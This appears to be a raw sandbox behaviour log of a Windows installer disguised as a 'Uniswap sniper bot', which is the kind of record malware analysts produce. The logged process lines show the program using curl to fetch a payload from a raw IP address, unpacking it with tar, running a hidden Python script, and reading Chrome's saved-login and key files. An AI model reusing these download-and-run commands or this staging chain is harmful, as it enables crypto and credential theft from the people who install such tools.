Source: uniswap-sniper-bot-with-gui.exe, 00000008.00000000.2096036514.00007FF6D5728000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: VMware, Inc.
Source: uniswap-sniper-bot-with-gui.exe, 00000008.00000000.2096036514.00007FF6D6009000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: Access-Control-Allow-Credentials: trueNet.RedirectChainLengthurl_chainload_state_paramdelegate_blocked_byhas_uploadis_pendingDelegateNet.URLRequest.ReferrerPolicyForRequest.SameOriginNet.URLRequest.ReferrerHasInformativePath.SameOriginNet.URLRequest.ReferrerPolicyForRequest.CrossOriginNet.URLRequest.ReferrerHasInformativePath.CrossOrigin../../net/url_request/url_request_job.ccOnDonenum_failuresrelease_after_msThrottling.RequestThrottled../../net/base/network_interfaces_win.ccWlanApiwlanapi.dllWlanQueryInterfaceWlanSetInterfaceVMnetGetAdaptersAddresses failed: x
Source: uniswap-sniper-bot-with-gui.exe, 00000008.00000000.2096036514.00007FF6D5728000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: VMware Inc.
Source: uniswap-sniper-bot-with-gui Setup 1.0.0.exe, 00000000.00000003.1903256672.0000000006020000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: (IsLinux() && isVMWare) \|\| (IsAndroid() && isNvidia) \|\| (IsAndroid() && GetAndroidSdkLevel() < 27 && IsAdreno5xxOrOlder(functions)) \|\| (IsAndroid() && IsMaliT8xxOrOlder(functions)) \|\| (IsAndroid() && IsMaliG31OrOlder(functions))
Source: uniswap-sniper-bot-with-gui.exe, 00000008.00000000.2096036514.00007FF6D5728000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: Gearway Electronics (Dong Guan) Co., Ltd.VMware Inc.Olimex Ltd.
Source: uniswap-sniper-bot-with-gui.exe, 00000008.00000000.2096036514.00007FF6D5728000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: Qemu Audio Device
Source: uniswap-sniper-bot-with-gui.exe, 00000008.00000000.2096036514.00007FF6D63E5000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: lgnW2/4/PEZB31jiVg88O8EckzXZOFKs7sjsLjBOlDW0JB9LeGna8gI4zJVSk/BwJVmcIGfE
Source: uniswap-sniper-bot-with-gui.exe, 00000008.00000000.2096036514.00007FF6D5728000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: VMware can crash with older drivers and WebGL content

Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\tasklist.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\uniswap-sniper-bot-with-gui Setup 1.0.0.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c tasklist /FI "USERNAME eq %USERNAME%" /FI "IMAGENAME eq uniswap-sniper-bot-with-gui.exe" /FO csv \| "C:\Windows\system32\find.exe" "uniswap-sniper-bot-with-gui.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist /FI "USERNAME eq user" /FI "IMAGENAME eq uniswap-sniper-bot-with-gui.exe" /FO csv	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe "C:\Windows\system32\find.exe" "uniswap-sniper-bot-with-gui.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://86.104.74.51:1224/pdown""	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1780 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --mojo-platform-channel-handle=2052 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=renderer --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --app-path="C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar" --no-sandbox --no-zygote --lang=en-GB --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --launch-time-ticks=4496754429 --mojo-platform-channel-handle=2376 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:1	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "tar -xf C:\Users\user\AppData\Local\Temp\p2.zip -C C:\Users\user"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1016 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c ""C:\Users\user\.pyp\python.exe" "C:\Users\user/.sysinfo""	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl -Lo "C:\Users\user\AppData\Local\Temp\p.zi" "http://86.104.74.51:1224/pdown"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tar.exe tar -xf C:\Users\user\AppData\Local\Temp\p2.zip -C C:\Users\user
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\.pyp\python.exe "C:\Users\user\.pyp\python.exe" "C:\Users\user/.sysinfo"
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "ver"

Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "c:\users\user\appdata\local\programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1780 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "c:\users\user\appdata\local\programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\uniswap-sniper-bot-with-gui" --mojo-platform-channel-handle=2052 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "c:\users\user\appdata\local\programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=renderer --user-data-dir="c:\users\user\appdata\roaming\uniswap-sniper-bot-with-gui" --app-path="c:\users\user\appdata\local\programs\uniswap-sniper-bot-with-gui\resources\app.asar" --no-sandbox --no-zygote --lang=en-gb --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --launch-time-ticks=4496754429 --mojo-platform-channel-handle=2376 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:1
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "c:\users\user\appdata\local\programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="c:\users\user\appdata\roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=uaaaaaaaaadoaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaacaaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1016 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filepath = \"c:\users\user\appdata\local\temp\tmpa8kcau3f.exe\" invoke-webrequest -uri $url -outfile $filepath "
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "c:\users\user\appdata\local\programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --user-data-dir="c:\users\user\appdata\roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=uaaaaaaaaadgaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1780 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "c:\users\user\appdata\local\programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=utility --utility-sub-type=network.mojom.networkservice --lang=en-gb --service-sandbox-type=none --user-data-dir="c:\users\user\appdata\roaming\uniswap-sniper-bot-with-gui" --mojo-platform-channel-handle=2052 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:8	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "c:\users\user\appdata\local\programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=renderer --user-data-dir="c:\users\user\appdata\roaming\uniswap-sniper-bot-with-gui" --app-path="c:\users\user\appdata\local\programs\uniswap-sniper-bot-with-gui\resources\app.asar" --no-sandbox --no-zygote --lang=en-gb --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=4 --launch-time-ticks=4496754429 --mojo-platform-channel-handle=2376 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:1	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Process created: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe "c:\users\user\appdata\local\programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="c:\users\user\appdata\roaming\uniswap-sniper-bot-with-gui" --gpu-preferences=uaaaaaaaaadoaaayaaaaaaaaaaaaaaaaaabgaaaaaaawaaaaaaaaaaaaaacaaaaaaaaaaaaaaaaaaaaaaaaaaegaaaaaaaaasaaaaaaaaaayaaaaagaaabaaaaaaaaaagaaaaaaaaaaqaaaaaaaaaaaaaaaoaaaaeaaaaaaaaaabaaaadgaaaagaaaaaaaaacaaaaaaaaaa= --mojo-platform-channel-handle=1016 --field-trial-handle=1872,i,4072490396962110215,10886097777995428713,131072 --disable-features=sparerendererforsiteperprocess,winretrievesuggestionsonlyondemand /prefetch:2	Jump to behavior
Source: C:\Users\user\.pyp\python.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command " $url = \"https://www.python.org/ftp/python/3.11.0/python-3.11.0-amd64.exe\" $filepath = \"c:\users\user\appdata\local\temp\tmpa8kcau3f.exe\" invoke-webrequest -uri $url -outfile $filepath "

Source: uniswap-sniper-bot-with-gui.exe, 00000008.00000000.2096036514.00007FF6D5728000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: ../../electron/shell/browser/ui/views/electron_views_delegate_win.ccGetAppbarAutohideEdgesShell_TrayWnd
Source: uniswap-sniper-bot-with-gui.exe, 00000008.00000000.2096036514.00007FF6D63E5000.00000002.00000001.01000000.0000000D.sdmp	Binary or memory string: ?@../../third_party/webrtc/modules/desktop_capture/win/cursor.ccCreateMouseCursorFromHCursorUnable to get cursor icon info. Error = Unable to get bitmap info. Error = Unable to get bitmap bits. Error = DwmIsCompositionEnabledDwmGetWindowAttribute../../third_party/webrtc/modules/desktop_capture/win/window_capture_utils.ccFail to create instance of VirtualDesktopManagerChrome_WidgetWin_Progman

Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\bufferutil\package.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\bufferutil\index.js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\bufferutil\package.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\utf-8-validate\package.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\utf-8-validate\index.js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\utf-8-validate\package.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\secp256k1\package.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\secp256k1\index.js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\secp256k1\bindings.js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\secp256k1\package.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\secp256k1\lib\index.js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\keccak\package.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\keccak\index.js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\keccak\bindings.js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\keccak\package.json VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\keccak\lib\api\index.js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\keccak\lib\api\keccak.js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\resources\app.asar.unpacked\node_modules\keccak\lib\api\shake.js VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Windows\System32\spool\drivers\color\sRGB Color Space Profile.icm VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\p2.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\p2.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\p2.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\.pyp\python.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local VolumeInformation
Source: C:\Users\user\AppData\Local\Programs\uniswap-sniper-bot-with-gui\uniswap-sniper-bot-with-gui.exe	Queries volume information: C:\Users\user\AppData\Local\Programs VolumeInformation
Source: C:\Windows\System32\tar.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\p2.zip VolumeInformation
Source: C:\Windows\System32\tar.exe	Queries volume information: C:\Users VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__pycache__\__init__.cpython-311.pyc VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__init__.py VolumeInformation
Source: C:\Users\user\.pyp\python.exe	Queries volume information: C:\Users\user\.pyp\Lib\encodings\__init__.py VolumeInformation
